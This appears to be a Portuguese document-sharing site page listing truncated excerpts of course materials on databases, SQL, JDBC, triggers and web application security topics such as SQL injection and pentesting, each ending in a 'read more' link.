Autenticação e Autorização Autenticação e Autorização Introdução A segurança em aplicações corporativas está relacionada a diversos aspectos, tais como: autenticação, autorização e auditoria. A autenticação identifica quem acessa

Leia mais

PadrãoIX. Módulo II JAVA. Marcio de Carvalho Victorino. JDBC - Java Database Connectivity A,L,F,M

PadrãoIX. Módulo II JAVA. Marcio de Carvalho Victorino. JDBC - Java Database Connectivity A,L,F,M JAVA Marcio de Carvalho Victorino 1 JDBC - Java Database Connectivity 2 1 JDBC conceito JDBC é uma API (Application Program Interface) para acesso a SGBD s (Sistemas Gerenciadores de Banco de Dados) relacionais

Leia mais

Faculdade Pitágoras 16/08/2011. Curso Superior de Tecnologia: Banco de Dados Sistemas para Internet

Faculdade Pitágoras 16/08/2011. Curso Superior de Tecnologia: Banco de Dados Sistemas para Internet Faculdade Pitágoras Curso Superior de Tecnologia: Banco de Dados Sistemas para Internet Disciplina: Banco de Dados Prof.: Fernando Hadad Zaidan SQL A linguagem SQL é responsável por garantir um bom nível

Leia mais

Faculdade Pitágoras. Curso Superior de Tecnologia: Banco de Dados. Disciplina: Banco de Dados Prof.: Fernando Hadad Zaidan SQL

Faculdade Pitágoras. Curso Superior de Tecnologia: Banco de Dados. Disciplina: Banco de Dados Prof.: Fernando Hadad Zaidan SQL Faculdade Pitágoras Curso Superior de Tecnologia: Banco de Dados Disciplina: Banco de Dados Prof.: Fernando Hadad Zaidan SQL A linguagem SQL é responsável por garantir um bom nível de independência do

Leia mais

Armazenamento organizado facilitando SCRUD; Agiliza processo de desenvolvimento de sistemas;

Armazenamento organizado facilitando SCRUD; Agiliza processo de desenvolvimento de sistemas; Conjunto de informações relacionadas entre si; Armazenamento organizado facilitando SCRUD; Agiliza processo de desenvolvimento de sistemas; Conjunto de Tabelas onde cada linha é um vetor de dados específico;

Leia mais

SQL Structured Query Language

SQL Structured Query Language Janai Maciel SQL Structured Query Language (Banco de Dados) Conceitos de Linguagens de Programação 2013.2 Structured Query Language ( Linguagem de Consulta Estruturada ) Conceito: É a linguagem de pesquisa

Leia mais

Introdução à Banco de Dados. Nathalia Sautchuk Patrício

Introdução à Banco de Dados. Nathalia Sautchuk Patrício Introdução à Banco de Dados Nathalia Sautchuk Patrício Histórico Início da computação: dados guardados em arquivos de texto Problemas nesse modelo: redundância não-controlada de dados aplicações devem

Leia mais

Segurança Web com PHP 5

Segurança Web com PHP 5 Segurança Web com PHP 5 Douglas V. Pasqua Zend Certified Engineer douglas.pasqua@gmail.com Objetivo Disseminar boas práticas para o desenvolvimento de código seguro em php. Exemplificar como são feitos

Leia mais

PROGRAMAÇÃO EM BANCO DADOS Stored Procedure e Trigger

PROGRAMAÇÃO EM BANCO DADOS Stored Procedure e Trigger PROGRAMAÇÃO EM BANCO DADOS Stored Procedure e Trigger A tecnologia de banco de dados permite persistir dados de forma a compartilha-los com varias aplicações. Aplicação 1 aplicação 2 aplicação 3 SGDB Banco

Leia mais

Aula 13 Mecanismos de Proteção. Fernando José Karl, AMBCI, CISSP, CISM, ITIL

Aula 13 Mecanismos de Proteção. Fernando José Karl, AMBCI, CISSP, CISM, ITIL Aula 13 Mecanismos de Proteção Fernando José Karl, AMBCI, CISSP, CISM, ITIL Agenda ü Mecanismos de Proteção ü Antivírus ü Antimalware ü Antivírus ü Um sistema de sistema de antivírus detecta códigos maliciosos

Leia mais

Guia de administração para a integração do Portrait Dialogue 6.0. Versão 7.0A

Guia de administração para a integração do Portrait Dialogue 6.0. Versão 7.0A Guia de administração para a integração do Portrait Dialogue 6.0 Versão 7.0A 2013 Pitney Bowes Software Inc. Todos os direitos reservados. Esse documento pode conter informações confidenciais ou protegidas

Leia mais

Programação Orientada a Objetos JDBC Java Database Connectivity

Programação Orientada a Objetos JDBC Java Database Connectivity Especialização em Engenharia de Software Programação Orientada a Objetos JDBC Java Database Connectivity Sérgio Soares scbs@cin.ufpe.br Objetivos Apresentar os conceitos básicos da especificação de Java

Leia mais

PROGRAMAÇÃO PARA DISPOSITIVOS MÓVEIS ARMAZENAMENTO EM BD NO DM. Prof. Angelo Augusto Frozza, M.Sc. http://about.me/tilfrozza

PROGRAMAÇÃO PARA DISPOSITIVOS MÓVEIS ARMAZENAMENTO EM BD NO DM. Prof. Angelo Augusto Frozza, M.Sc. http://about.me/tilfrozza PROGRAMAÇÃO PARA DISPOSITIVOS MÓVEIS ARMAZENAMENTO EM BD NO DM Prof. Angelo Augusto Frozza, M.Sc. http://about.me/tilfrozza ROTEIRO Introdução App de exemplo Implementação do exemplo Testes realizados

Leia mais

OWASP. The OWASP Foundation http://www.owasp.org. As 10 mais críticas vulnerabilidades de segurança em Aplicações Web

OWASP. The OWASP Foundation http://www.owasp.org. As 10 mais críticas vulnerabilidades de segurança em Aplicações Web As 10 mais críticas vulnerabilidades de segurança em Aplicações Web Carlos Serrão Portugal ISCTE/DCTI/Adetti/NetMuST Abril, 2009 carlos.serrao@iscte.pt carlos.j.serrao@gmail.com Copyright 2004 - The Foundation

Leia mais

PROGRAMAÇÃO PARA DISPOSITIVOS MÓVEIS ARMAZENAMENTO EM BD NO DM. Prof. Angelo Augusto Frozza, M.Sc. http://about.me/tilfrozza

PROGRAMAÇÃO PARA DISPOSITIVOS MÓVEIS ARMAZENAMENTO EM BD NO DM. Prof. Angelo Augusto Frozza, M.Sc. http://about.me/tilfrozza PROGRAMAÇÃO PARA DISPOSITIVOS MÓVEIS ARMAZENAMENTO EM BD NO DM Prof. Angelo Augusto Frozza, M.Sc. http://about.me/tilfrozza ROTEIRO Introdução App de exemplo Implementação do exemplo Testes realizados

Leia mais

Gestão de Segurança da Informação. Segurança de Banco de Dados ( SQL Injection, APBIDS, Modelagem )

Gestão de Segurança da Informação. Segurança de Banco de Dados ( SQL Injection, APBIDS, Modelagem ) Segurança de Aplicações e Banco de Dados Gestão de Segurança da Informação pós-graduação Lato Sensu Segurança de Banco de Dados ( SQL Injection, APBIDS, Modelagem ) Patrick Tracanelli Francisco Temponi

Leia mais

Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL):

Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL): Nomes: Questão 1 Vulnerabilidade: SQL Injection (Injeção de SQL): Nos últimos anos uma das vulnerabilidades mais exploradas por usuários mal-intencionados é a injeção de SQL, onde o atacante realiza uma

Leia mais

Integrando Java com Banco de Dados

Integrando Java com Banco de Dados Especialização em Engenharia de Software Programação Orientada a Objetos JDBC Java Database Connectivity Sérgio Soares scbs@cin.ufpe.br Objetivos Apresentar os conceitos básicos da especificação de Java

Leia mais

Curso Pentest Profissional

Curso Pentest Profissional Ementa Oficial do Curso Pentest Profissional Capítulo 01 Introdução Mercado de Segurança da Informação (Pentest) Preparação Entender o cliente Definir o escopo e limitações Janela de testes Contato Responsabilidades

Leia mais

Introdução ao SQL. O que é SQL?

Introdução ao SQL. O que é SQL? Introdução ao SQL 1 O que é SQL? Inicialmente chamada de Sequel, SQL (Structured Query Language), é a linguagem padrão utilizada para comunicar-se com um banco de dados relacional. A versão original foi

Leia mais

Banco de Dados. Maurício Edgar Stivanello

Banco de Dados. Maurício Edgar Stivanello Banco de Dados Maurício Edgar Stivanello Agenda Conceitos Básicos SGBD Projeto de Banco de Dados SQL Ferramentas Exemplo Dado e Informação Dado Fato do mundo real que está registrado e possui um significado

Leia mais

Segurança em Banco de Dados

Segurança em Banco de Dados Centro de Educação Superior de Brasília Instituto de Educação Superior de Brasília Pós-Graduação em Banco de Dados Segurança em Banco de Dados Cláudio Reis Ferreira Galvão José Augusto Campos Versiani

Leia mais

Entendendo Injeção de SQL

Entendendo Injeção de SQL Entendendo Injeção de SQL Autor K4m1k451 < k4m1k451@gmail.com bere_bad@hotmail.com > 18/05/2009 Sumário: ---[ 0x00 Introdução... 4 ---[ 0x01 Desmistificando as single quotes... 4 ---[ 0x02 Injetando...

Leia mais

Ataques a Aplicações Web

Ataques a Aplicações Web Ataques a Aplicações Web - Uma visão prática - Carlos Nilton A. Corrêa http://www.carlosnilton.com.br/ ccorrea@unimedrj.com.br @cnacorrea Agenda 1. Panorama da (in)segurança web 2. Google hacking 3. SQL

Leia mais

Programação de Servidores CST Redes de Computadores. Marx Gomes Van der Linden

Programação de Servidores CST Redes de Computadores. Marx Gomes Van der Linden Programação de Servidores CST Redes de Computadores Marx Gomes Van der Linden Programação de Servidores Aplicações cliente/servidor para web. Fundamentos de HTML+CSS. Linguagem de programação de servidor:

Leia mais

Pen-test de Aplicações Web: Técnicas e Ferramentas

Pen-test de Aplicações Web: Técnicas e Ferramentas Divisão de Informática - DINF MJ Departamento de Polícia Federal Pen-test de Aplicações Web: Técnicas e Ferramentas Ivo de Carvalho Peixinho Perito Criminal Federal Agenda 1. Introdução 2. Ferramentas

Leia mais

Segurança em aplicações Web. Exemplos e Casos Práticos em

Segurança em aplicações Web. Exemplos e Casos Práticos em Segurança em aplicações Web Exemplos e Casos Práticos em Nuno Lopes, NEIIST 7º Ciclo de Apresentações. 28/Março/2007 Agenda: Register Globals Paths Cross-Site Scripting (XSS) Response Splitting / Header

Leia mais

SGBDs Móveis. Sumário 12/06/11. Emmanuel Férrer & Gabriela Fernanda. Introdução. Desafios do armazenamento. SQL Anywhere Studio.

SGBDs Móveis. Sumário 12/06/11. Emmanuel Férrer & Gabriela Fernanda. Introdução. Desafios do armazenamento. SQL Anywhere Studio. SGBDs Móveis Emmanuel Férrer & Gabriela Fernanda Introdução Sumário Desafios do armazenamento SQL Anywhere Studio DB2 Everyplace Microsoft SQL Server Oracle9I Lite Aplicações Móveis Referências 1 Introdução

Leia mais

PHP INTEGRAÇÃO COM MYSQL PARTE 1

PHP INTEGRAÇÃO COM MYSQL PARTE 1 INTRODUÇÃO PHP INTEGRAÇÃO COM MYSQL PARTE 1 Leonardo Pereira leonardo@estudandoti.com.br Facebook: leongamerti http://www.estudandoti.com.br Informações que precisam ser manipuladas com mais segurança

Leia mais

BANCO DE DADOS: SQL. Edson Anibal de Macedo Reis Batista. 27 de janeiro de 2010

BANCO DE DADOS: SQL. Edson Anibal de Macedo Reis Batista. 27 de janeiro de 2010 BANCO DE DADOS: SQL UERN - Universidade do Estado do Rio Grande do Norte. Departamento de Ciências da Computação. 27 de janeiro de 2010 índice 1 Introdução 2 3 Introdução SQL - Structured Query Language

Leia mais

Aula 14 Mecanismos de Proteção. Fernando José Karl, AMBCI, CISSP, CISM, ITIL

Aula 14 Mecanismos de Proteção. Fernando José Karl, AMBCI, CISSP, CISM, ITIL Aula 14 Mecanismos de Proteção Fernando José Karl, AMBCI, CISSP, CISM, ITIL Agenda ü Mecanismos de Proteção ü Antivírus ü Antimalware ü Antivírus ü Um sistema de sistema de antivírus detecta códigos maliciosos

Leia mais

www.coldfusionbrasil.com.br

www.coldfusionbrasil.com.br www.coldfusionbrasil.com.br 2000 1 O que é Cold Fusion? 3 Arquitetura Cold Fusion 3 Cold Fusion Markup Language (CFML) 4 O que devo saber para programar em CFML? 4 HTML 4 Desenho de Banco de Dados Relacionais

Leia mais

Manipulação de Banco de Dados com Java 1. Objetivos

Manipulação de Banco de Dados com Java 1. Objetivos Manipulação de Banco de Dados com Java 1. Objetivos Demonstrar os fundamentos básicos para a manipulação de banco de dados com Java; Apresentar a sintaxe de comandos SQL usados em Java. 2. Definições A

Leia mais

SQL Linguagem de Definição de Dados. Laboratório de Bases de Dados Profa. Dra. Cristina Dutra de Aguiar Ciferri

SQL Linguagem de Definição de Dados. Laboratório de Bases de Dados Profa. Dra. Cristina Dutra de Aguiar Ciferri SQL Linguagem de Definição de Dados SQL Structured Query Language Uma das mais importantes linguagens relacionais (se não a mais importante) Exemplos de SGBD que utilizam SQL Oracle Informix Ingress SQL

Leia mais

Segurança da Informação

Segurança da Informação Segurança da Informação Segurança e Vulnerabilidades em Aplicações Web jobona@terra.com.br Definição: Segurança Segundo o dicionário da Wikipédia, o termo segurança significa: 1. Condição ou estado de

Leia mais

Proposta de pentest. O pentest realizado vai desde ataques aos servidores até testes na programação das aplicações com tentativas reais de invasão;

Proposta de pentest. O pentest realizado vai desde ataques aos servidores até testes na programação das aplicações com tentativas reais de invasão; initsec Proposta de pentest 1. O que é? Pentest (Penetration Test) é uma avaliação de maneira realista da segurança empregada em aplicações web e infraestruturas de TI no geral. O Pentest constitui da

Leia mais

Linguagem SQL (Parte I)

Linguagem SQL (Parte I) Universidade Federal de Sergipe Departamento de Sistemas de Informação Itatech Group Jr Softwares Itabaiana Site: www.itatechjr.com.br E-mail: contato@itatechjr.com.br Linguagem SQL (Parte I) Introdução

Leia mais

Administração de Usuários e Privilégios no Banco de Dados

Administração de Usuários e Privilégios no Banco de Dados Administração de Usuários e Privilégios no Banco de Dados Todo agrupamento de bancos de dados possui um conjunto de usuários de banco de dados. Estes usuários são distintos dos usuários gerenciados pelo

Leia mais

2008.1. A linguagem SQL

2008.1. A linguagem SQL SQL 2008.1 A linguagem SQL SQL - Structured Query Language. Foi definida nos laboratórios de pesquisa da IBM em San Jose, California, em 1974. Teve seus fundamentos no modelo relacional Sua primeira versão

Leia mais

Sumário Agradecimentos... 19 Sobre.o.autor... 20 Prefácio... 21 Capítulo.1..Bem-vindo.ao.MySQL... 22

Sumário Agradecimentos... 19 Sobre.o.autor... 20 Prefácio... 21 Capítulo.1..Bem-vindo.ao.MySQL... 22 Sumário Agradecimentos... 19 Sobre o autor... 20 Prefácio... 21 Capítulo 1 Bem-vindo ao MySQL... 22 1.1 O que é o MySQL?...22 1.1.1 História do MySQL...23 1.1.2 Licença de uso...23 1.2 Utilizações recomendadas...24

Leia mais

Campus Party 2016 São Paulo, SP 27 de janeiro de 2016

Campus Party 2016 São Paulo, SP 27 de janeiro de 2016 Campus Party 2016 São Paulo, SP 27 de janeiro de 2016 WORKSHOP: Programação segura para WEB Dionathan Nakamura nakamura@cert.br Agenda 14:15 16:00 10-20 min: configuração inicial 30-45 min: parte teórica

Leia mais

Ementa Completa. Introdução

Ementa Completa. Introdução Ementa Completa Introdução Mercado de Segurança da Informação (Pentest) Preparação Entender o cliente Definir o escopo e limitações Janela de testes Contato Responsabilidades Autorização Non-Disclosure

Leia mais

Data Transformation Services (DTS) por Anderson Ferreira Souza

Data Transformation Services (DTS) por Anderson Ferreira Souza Data Transformation Services (DTS) por Anderson Ferreira Souza O Sql Server possui um recurso extremamente poderoso que é muito pouco utilizado pelos administradores e programadores. Com certeza, sendo

Leia mais

Aplicações Seguras. Carlos.Ribeiro@tagus.ist.utl.pt

Aplicações Seguras. Carlos.Ribeiro@tagus.ist.utl.pt Aplicações Seguras Carlos.Ribeiro@tagus.ist.utl.pt Problemas de segurança Protocolos de autenticação mal desenhados. E.g. WEP, 802.1x (1º versão), PPTP, MS-CHAPv1. Protocolos de comunicação inseguros.

Leia mais

JPA: Persistência padronizada em Java

JPA: Persistência padronizada em Java JPA: Persistência padronizada em Java FLÁVIO HENRIQUE CURTE Bacharel em Engenharia de Computação flaviocurte.java@gmail.com Programação Orientada a Objetos X Banco de Dados Relacionais = Paradigmas diferentes

Leia mais

Programação WEB II. PHP e Banco de Dados. progweb2@thiagomiranda.net. Thiago Miranda dos Santos Souza

Programação WEB II. PHP e Banco de Dados. progweb2@thiagomiranda.net. Thiago Miranda dos Santos Souza PHP e Banco de Dados progweb2@thiagomiranda.net Conteúdos Os materiais de aula, apostilas e outras informações estarão disponíveis em: www.thiagomiranda.net PHP e Banco de Dados É praticamente impossível

Leia mais

Triggers e mais... Instituto Militar de Engenharia IME 1o. Semestre/2005 Triggers Propósito mais amplo que restrições Restrições onde se explicita o evento Regras event-condition-action (ECA) Eventos:

Leia mais

Segurança da Informação:

Segurança da Informação: Segurança da Informação: Tratando dados em PHP Objetivo: O objetivo desta palestra é demonstrar os riscos inerentes de se trabalhar com informações externas à aplicações desenvolvidas em PHP, como o descuido

Leia mais

Triggers em PostgreSQL. Linguagem de Programação de Banco de Dados. Triggers em PostgreSQL. Triggers em PostgreSQL

Triggers em PostgreSQL. Linguagem de Programação de Banco de Dados. Triggers em PostgreSQL. Triggers em PostgreSQL Prof. Ms. Luiz Alberto Contato: lasf.bel@gmail.com Linguagem de Programação de Banco de Dados Triggers em PostgreSQL Todos os bancos de dados comerciais possuem uma linguagem procedural auxiliar para a

Leia mais